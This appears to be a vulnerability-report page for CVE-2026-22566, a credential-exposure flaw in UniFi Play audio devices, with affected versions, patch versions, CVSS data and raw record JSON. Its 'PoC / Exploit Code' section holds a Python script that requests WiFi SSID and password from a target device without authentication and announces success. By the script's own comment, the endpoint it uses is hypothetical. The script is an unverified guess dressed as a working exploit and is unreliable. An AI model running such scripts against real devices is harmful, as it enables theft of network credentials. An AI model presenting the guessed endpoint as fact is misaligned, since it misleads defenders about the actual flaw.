Security Vulnerability Report
CVE-2026-22566 (CVSS 7.5 HIGH)

Published: 2026-04-13 22:16:28
Last Modified: 2026-04-30 16:14:21

Description

An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials.

Affected Products:
UniFi Play PowerAmp (Version 1.0.35 and earlier)
UniFi Play Audio Port (Version 1.0.24 and earlier)

Mitigation:
Update UniFi Play PowerAmp to Version 1.0.38 or later
Update UniFi Play Audio Port to Version 1.1.9 or later

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No structured configuration data is available in the vulnerability record; the affected versions below are taken from the advisory description.

UniFi Play PowerAmp <= 1.0.35
UniFi Play Audio Port <= 1.0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# PoC for CVE-2026-22566: Improper Access Control in UniFi Play
# This script attempts to retrieve WiFi credentials without authentication.


def exploit_unifi_play(target_ip):
    # Hypothetical vulnerable endpoint based on the vulnerability description;
    # the advisory does not name the actual endpoint.
    # Attackers can access config data without auth due to improper access control
    url = f"http://{target_ip}/api/v1/network/wifi/config"
    headers = {
        "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-22566-Scanner)",
        "Accept": "application/json",
    }
    print(f"[*] Attempting to retrieve credentials from {target_ip}...")
    try:
        # Send request without authentication tokens
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print("[+] Exploit Successful! Sensitive data retrieved:")
            print(json.dumps(data, indent=4))
            # Extract specific fields if they exist
            if "wifi_ssid" in data and "wifi_password" in data:
                print(f"[+] SSID: {data['wifi_ssid']}")
                print(f"[+] Password: {data['wifi_password']}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print("[-] The device might be patched or not vulnerable.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    except json.JSONDecodeError:
        print("[-] Response was not valid JSON.")


if __name__ == "__main__":
    # Replace with the actual IP address of the target device
    target = "192.168.1.100"
    exploit_unifi_play(target)
```

References

https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 (vendor advisory, Security Advisory Bulletin 063)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22566",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-13T22:16:28.437",
    "lastModified": "2026-04-30T16:14:21.333",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials. \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)\nUniFi Play Audio Port  (Version 1.0.24 and earlier) \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83",
        "source": "[email protected]"
      }
    ]
  }
}
```